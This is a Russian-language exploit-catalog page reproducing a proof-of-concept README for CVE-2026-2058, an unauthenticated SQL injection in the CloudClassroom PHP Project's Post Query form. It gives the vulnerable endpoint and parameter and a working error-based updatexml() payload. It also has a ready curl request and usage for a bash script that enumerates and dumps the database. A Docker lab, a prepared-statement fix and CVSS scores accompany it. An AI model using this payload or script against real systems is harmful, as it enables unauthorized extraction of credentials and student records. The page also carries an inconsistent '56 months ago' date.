Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-2058-PoC — Доказательство концепции эксплуатации для CVE-2026-2058, SQL-инъекции в PHP-проекте CloudClassroom, с автоматизированным перебором базы данных и извлечением данных. | Kitploit
Инструменты/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

Доказательство концепции эксплуатации для CVE-2026-2058, SQL-инъекции в PHP-проекте CloudClassroom, с автоматизированным перебором базы данных и извлечением данных.

Репозиторий
56 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-2058-PoC – SQL-инъекция в PHP-проекте CloudClassroom

Обзор

Уязвимость SQL-инъекции существует в функциональности Post Query проекта CloudClassroom PHP Project (v1.0).

Уязвимость позволяет злоумышленникам внедрять произвольные SQL-команды через POST-параметр squeryx, что приводит к перечислению базы данных и извлечению данных.

Этот репозиторий содержит Proof of Concept (PoC) эксплойт, демонстрирующий, как уязвимость может быть использована для извлечения конфиденциальных данных из серверной базы данных.


Информация об уязвимости

ПолеЗначение
CVECVE-2026-2058
Тип уязвимостиSQL-инъекция
CWECWE-89
Затронутое ПОCloudClassroom PHP Project
Затронутая версия1.0
КомпонентФункциональность Post Query
Вектор атакиУдалённый
Требуется аутентификацияНет
ВоздействиеРаскрытие базы данных
Степень серьёзностиВысокая
Ссылка на паттерн атакиCAPEC-66

Уязвимая конечная точка

root@kitploit:~
POST /postquerypublic

Уязвимый параметр

root@kitploit:~
squeryx

Первопричина

Серверный код напрямую конкатенирует пользовательский ввод в SQL-запрос без надлежащей санитизации или параметризованных запросов.

Пример уязвимого кода:

root@kitploit:~
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

Поскольку $tempsquery формируется из пользовательского ввода, злоумышленники могут внедрять произвольный SQL.


Уязвимая лабораторная среда (Docker)

Для целей тестирования и исследований доступна уязвимая Docker-среда.

Запуск уязвимого приложения

root@kitploit:~
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

Proof of Concept

Уязвимость может быть использована с помощью техники error-based SQL-инъекции, применяющей функцию MySQL updatexml().

Пример полезной нагрузки:

root@kitploit:~
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

Ручная эксплуатация

Пример curl-запроса:

root@kitploit:~
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

Ожидаемый ответ:

root@kitploit:~
XPATH syntax error: '~cc_db~'

Эксплойт-скрипт

Этот репозиторий включает bash-эксплойт, который автоматически:

  • Извлекает имя базы данных
  • Перечисляет таблицы
  • Перечисляет столбцы
  • Выгружает данные таблиц

Использование

root@kitploit:~
chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

Пример:

root@kitploit:~
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

Воздействие

Злоумышленник может:

  • Перечислить структуру базы данных
  • Извлечь конфиденциальные данные
  • Получить учётные данные администратора
  • Получить доступ к записям студентов
  • Полностью скомпрометировать серверную базу данных

Оценка CVSS

NIST NVD

  • Базовый балл: 9.8 (КРИТИЧЕСКИЙ)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • Базовый балл: 7.3 (ВЫСОКИЙ)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ Примечание: Оценка CVSS от NVD отличается от оценки CNA (VulDB) из-за различных оценок воздействия.


EPSS (Exploit Prediction Scoring System)

Система прогнозирования вероятности эксплуатации (EPSS) оценивает вероятность того, что уязвимость будет использована в реальных условиях.

CVEВероятность EPSSПроцентильДата
CVE-2026-20580.000287.62 %2026-03-01

Источник: Набор данных FIRST EPSS


Меры по устранению

Разработчикам следует:

  • Использовать подготовленные выражения
  • Внедрить валидацию ввода
  • Надлежащим образом экранировать пользовательский ввод
  • Применять принцип минимальных привилегий для базы данных

Пример безопасной реализации:

root@kitploit:~
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

Скриншоты

Эксплуатация SQL-инъекции

image

image

Ссылки

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

Отказ от ответственности

Этот эксплойт предоставлен только в образовательных и исследовательских целях.

Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим кодом.


Автор

bl4dsc4n

Исследователь безопасности

Скачать инструмент